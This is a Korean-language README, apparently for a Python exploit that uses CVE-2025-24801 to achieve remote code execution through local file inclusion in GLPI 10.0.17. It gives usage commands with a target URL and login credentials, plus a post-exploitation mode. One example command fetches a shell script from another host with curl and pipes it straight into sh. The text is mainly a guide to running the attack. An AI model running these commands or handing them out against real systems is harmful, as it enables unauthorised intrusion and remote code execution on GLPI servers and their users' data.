
GLPI 10.0.17에서 로컬 파일 포함을 통한 원격 코드 실행을 달성하는 CVE-2025-24801용 Python 익스플로잇입니다. 사후 악용을 위한 명령 실행 모드가 포함되어 있습니다.
이 익스플로잇은 CVE-2025-24801을 사용하여 GLPI 10.0.17에서 Local File Inclusion(LFI)을 통한 원격 코드 실행(RCE)을 달성합니다. 이 CVE의 개념 증명(PoC)은 GLPI에서 이 취약점에 대한 설명을 제공합니다.
일부 애플리케이션은 /glpi/ 엔드포인트를 노출합니다(예: http://172.16.11.130:8080/glpi/front/computer.form.php). 대상 애플리케이션에 이 엔드포인트가 포함된 경우 --url 매개변수에 이를 추가해야 합니다(예: --url http://172.16.11.130:8080/glpi).
사용 예시.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
이미 이 익스플로잇을 실행하여 RCE를 트리거한 경우 --cmd 매개변수를 사용하여 명령만 실행할 수 있습니다.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"